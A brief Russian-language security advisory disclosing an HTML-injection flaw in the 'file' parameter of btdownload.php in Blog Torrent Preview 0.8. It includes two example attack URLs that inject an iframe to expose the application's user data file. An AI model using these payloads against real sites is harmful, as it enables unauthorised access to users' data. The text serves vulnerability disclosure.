Программа: Blog Torrent Preview Version 0.8
Удаленный атакующий может получить доступ к важным данным пользователей.
Уязвимость существует в файле 'btdownload.php' из-за некорректной фильтрации данных в параметре 'file'. Удаленный атакующий может с помощью специально сформированного URL выполнить произвольный HTML код в браузере целевого пользователя.
Пример:
http://[target]/torrent_blog/btdownload.php?file= <iframe%20src=../data/users></iframe>
http://[target]/torrent_blog/btdownl oad.php?file= <iframe%20src=http://[target]/torrent_blog/data/users></iframe>
